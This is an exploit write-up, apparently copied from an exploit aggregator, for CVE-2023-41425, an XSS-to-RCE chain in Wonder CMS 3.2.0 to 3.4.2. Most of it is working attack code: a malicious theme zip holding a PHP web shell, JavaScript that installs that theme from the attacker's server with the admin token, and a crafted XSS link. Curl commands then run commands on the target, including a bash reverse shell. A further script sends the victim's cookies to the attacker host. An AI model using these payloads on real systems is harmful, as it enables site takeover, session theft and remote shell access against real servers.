Share
## https://sploitus.com/exploit?id=B05082FE-90B2-5DA3-9142-DC83352C8760
## https://sploitus.com/exploit?id=3A833277-4844-5F02-AFEF-5EA6BA8AC1AC
##############
Wonder CMS RCE
##############

|
| Description : XSS to RCE, Wonder CMS 3.2.0 <= 3.4.2
| Sources
| - https://github.com/prodigiousMind/CVE-2023-41425/tree/main
| - https://nvd.nist.gov/vuln/detail/CVE-2023-41425
|

***
RCE
***

.. code-block:: bash

# Setting vars
```$RHOST="http://host.com:80"```<br>
```$LHOST="10.10.14.152"```<br>
```$LPORT="4444"```<br>
```$LPORTWEB="80"```<br>

# Moving to a tmp dir
cd $(mktemp -d)

# Creating our evil theme zip file
```
mkdir -p evil
cat <<'EOF'>evil/evil.php
<?=`$_GET[0]`;?>
EOF
```

```
zip -r evil.zip evil/
```

# JS payload that will install the new theme
```
cat <<EOF>xssrce.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "${RHOST}/?installModule=http://${LHOST}:${LPORTWEB}/evil.zip&directoryName=whatever&type=themes&token=" + document.querySelectorAll('[name="token"]')[0].value, true);
xhr.send();
EOF
```
# Print XSS url
```
echo -e "\n# XSS RCE"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xssrce.js"></script><form+action="
EOF
```

# Starting a new web server to serve payloads
```
sudo python3 -m http.server $LPORTWEB &
```
|

| After sending the RCE XSS to administrator we get the following http calls

.. code-block::

10.129.252.14 - - [11/Aug/2024 18:42:26] "GET /xssrce.js HTTP/1.1" 304 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:31] "GET /evil.zip HTTP/1.1" 200 -
10.129.252.14 - - [11/Aug/2024 18:42:32] "GET /evil.zip HTTP/1.1" 200 -

|

| We can now make use of the php payload

.. code-block:: bash

# id
CMD="id"
```
curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"
```
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Reverse shell, (don't forget to listen first: nc -nvlp 4444)

CMD="bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"

curl --path-as-is "${RHOST}/themes/evil/evil.php?0=$(echo -n "$CMD"| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))")"

|

*******
Cookies
*******

| You can also steal cookies (and therefore the php session)

.. code-block:: bash

cat <<EOF>xsscookie.js
var xhr=new XMLHttpRequest();
xhr.open("GET", "http://${LHOST}:${LPORTWEB}/?"+document.cookie, true);
xhr.send();
EOF

echo -e "\n# XSS Retrieve PHP session"
cat <<EOF
${RHOST}/index.php?page=loginURL?"></form><script+src="http://${LHOST}:${LPORTWEB}/xsscookie.js"></script><form+action="
EOF

|